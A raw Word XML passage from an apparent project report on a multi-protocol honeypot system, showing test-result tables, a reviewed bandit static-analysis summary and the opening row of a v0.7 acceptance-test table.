            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Passed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Failed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="05BB82CA" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Unit (pytest, v0.7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">78</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">78</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="05BB82CA" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dashboard unit tests (vitest)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="05BB82CA" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Unit / functional — protocols (SSH, Telnet, HTTP, MQTT, RTSP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">29</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">29</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="05BB82CA" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Functional — Intel Engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="05BB82CA" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Functional — Dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0 (1 defect found and fixed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="05BB82CA" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Business rules (decision tables)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="05BB82CA" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Integration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="05BB82CA" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">70% acceptance tests (Section 8.6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4954" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Static security analysis.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bandit was re-run on the v0.7 code base excluding tests and the dashboard. It reported 0 high-severity findings and 44 medium findings, all reviewed: 33 B608 (SQL text built with f-strings — false positives, only integer interval values or fixed column names are interpolated and every user value is a %s parameter), 5 B104 (binding to 0.0.0.0 — intentional for honeypots), 5 B108 (/tmp strings that belong to the emulated file system) and 1 B310 (urlopen of the fixed Telegram HTTPS URL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Not yet tested (100% work).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Load testing (events per second), ML model evaluation (accuracy, F1, confusion matrix), live Telegram and SMTP delivery with real credentials, and a real-internet baseline on a public VPS are planned for the final milestone.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9111" w:name="_Toc9111"/>
      <w:r>
        <w:t xml:space="preserve">8.6 Acceptance Tests of the 70% Build (v0.7)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9111"/>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The following tests were executed on the v0.7 code with a full docker compose up --build deployment (Docker 29, iptables firewall back-end), using the bundled simulator as the traffic source. They cover the defects fixed since the 60% review (E1–E8) and every feature added for the 70% milestone.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">32</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Acceptance Tests of the 70% Build</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="82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466"/>
        <w:gridCol w:w="1648"/>
        <w:gridCol w:w="1669"/>
        <w:gridCol w:w="1899"/>
        <w:gridCol w:w="1899"/>
        <w:gridCol w:w="699"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2EBA6366" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">No.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Test case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Input</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Expected result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Actual result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Deployment: docker compose up --build</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">13 services + auth-init</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">All Up; db, api and firewall healthy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">All Up; auth-init exited 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
